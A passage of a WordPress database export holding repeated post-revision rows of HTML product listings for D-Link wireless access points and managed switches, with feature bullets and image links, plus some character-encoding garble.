applications</p><p>â€¢ Gigabit Ethernet port with 802.3af Power over Ethernet</p><p>â€¢ Multiple operation modes: AP, WDS with AP, WDS/Bridgeanf Client</p><p>â€¢ Support Inbuilt Radius server, Network Access protection (NAP)</p><p>â€¢ Equipped with 8 VLANs per band for multiple SSIDsÂ  Implementation</p><p>â€¢ Support Central WiFi Manager to configure and manage multiple AP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h3>Smart Switch</h3>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T/SFP+ Combo Slots<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G SFP+, Two 10 Gigabit Base-T /SFP+ Combo Ports<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>26-Port Layer 2 Lite Smart Managed Gigabit Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Port 10/100/1000 Base-T with 2 Gigabit SFP Ports<br />â€¢ Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>10 Gigabit Ethernet Smart Managed Switches</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>10 Gigabit Ethernet Connection</p><p>Improved Power Efficiency</p><p>Smart and Flexible Management</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 2 Smart Managed Gigabit PoE Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T PoE + 4 slots for Gigabit SFP<br />â€¢ Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br />â€¢ Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Access Control List (ACL) feature to enhances network security<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Built-in SNMP MIB for remote NetworkÂ Management Systems</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Support IEEE 802.3af (PoE) and 802.3at (PoE+) Â with Power Budget of 370W</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>','D-Link','','inherit','closed','closed','','1480-revision-v1','','','2019-09-25 12:44:35','2019-09-25 04:44:35','',1480,'https://bintara.com.my/blog/2019/09/25/1480-revision-v1/',0,'revision','',0),(3377,1,'2019-09-25 12:45:15','2019-09-25 04:45:15','<h2>D - Link Business Solution Product </h2>		\n			<h3>Business Wireless</h3>		\n			<h4>AC1750 Wave 2 Dualâ€‘Band WI-FI PoE Access Pointâ€‹</h4>		\n										<img width=\"500\" height=\"500\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png 500w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png 300w\" sizes=\"(max-width: 500px) 100vw, 500px\" />											\n		<p>Â 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>2.4GHz Wireless N300 Outdoor Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through</p><p>Two 10/100 Ethernet ports (one supporting PoE) allow for further physical expansion</p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage</p><p>Weather-proof design (IPX6) built to withstand harsh environments</p><p>Supports multiple operation modes â€“ AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater</p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic</p><p>Provides WLAN partitioning for deployments such as wireless hot spots</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1750 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards</p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 MbpsÂ  Over 5 GHz band</p><p>Support load balancing to ensure maximum performance by limiting userÂ  per AP</p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications</p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHzÂ  or 5 GHz band</p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet</p><p>Support multiple operation â€“ AP, WDS with AP, WDS/Bridge and Client</p><p>RuggedÂ  metal housing &amp;Â  Plenum-rated chassis</p><p>Built in Radius ServerÂ  allowing users to create their accounts within the device itself.</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N600 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>â€¢ MU-MIMO with beamforming</p><p>â€¢ Band steering</p><p>â€¢ Gigabit PoE-capable LAN port</p><p>â€¢ AP Array utility support</p><p>â€¢ Free D-Link Central WiFiManager</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>AC1300 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>Enjoy High-performance Wireless Connectivity</p><p>â€“ Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications</p><p>MU-MIMO with Beamforming</p><p>â€“ Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network</p><p>Multiple Operational Modes</p><p>-Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>N300 Wireless PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ High-speed wireless performance with 300 Mbps wireless signal rates</p><p>â€¢ Support Wi-fi Multimediaâ„¢ (WMM) for audio, video, and voice applications</p><p>â€¢ Gigabit Ethernet port with 802.3af Power over Ethernet</p><p>â€¢ Multiple operation modes: AP, WDS with AP, WDS/Bridgeanf Client</p><p>â€¢ Support Inbuilt Radius server, Network Access protection (NAP)</p><p>â€¢ Equipped with 8 VLANs per band for multiple SSIDsÂ  Implementation</p><p>â€¢ Support Central WiFi Manager to configure and manage multiple AP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h3>Smart Switch</h3>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T/SFP+ Combo Slots<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G SFP+, Two 10 Gigabit Base-T /SFP+ Combo Ports<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>26-Port Layer 2 Lite Smart Managed Gigabit Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Port 10/100/1000 Base-T with 2 Gigabit SFP Ports<br />â€¢ Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>10 Gigabit Ethernet Smart Managed Switches</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>10 Gigabit Ethernet Connection</p><p>Improved Power Efficiency</p><p>Smart and Flexible Management</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 2 Smart Managed Gigabit PoE Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T PoE + 4 slots for Gigabit SFP<br />â€¢ Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br />â€¢ Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Access Control List (ACL) feature to enhances network security<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Built-in SNMP MIB for remote NetworkÂ Management Systems</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Support IEEE 802.3af (PoE) and 802.3at (PoE+) Â with Power Budget of 370W</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>','D-Link','','inherit','closed','closed','','1480-revision-v1','','','2019-09-25 12:45:15','2019-09-25 04:45:15','',1480,'https://bintara.com.my/blog/2019/09/25/1480-revision-v1/',0,'revision','',0),(3378,1,'2019-09-25 12:45:44','2019-09-25 04:45:44','<h2>D - Link Business Solution Product </h2>		\n			<h3>Business Wireless</h3>		\n			<h4>AC1750 Wave 2 Dualâ€‘Band WI-FI PoE Access Pointâ€‹</h4>		\n										<img width=\"500\" height=\"500\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png 500w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png 300w\" sizes=\"(max-width: 500px) 100vw, 500px\" />											\n		<p>Â 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>2.4GHz Wireless N300 Outdoor Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through</p><p>Two 10/100 Ethernet ports (one supporting PoE) allow for further physical expansion</p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage</p><p>Weather-proof design (IPX6) built to withstand harsh environments</p><p>Supports multiple operation modes â€“ AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater</p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic</p><p>Provides WLAN partitioning for deployments such as wireless hot spots</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1750 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards</p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 MbpsÂ  Over 5 GHz band</p><p>Support load balancing to ensure maximum performance by limiting userÂ  per AP</p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice 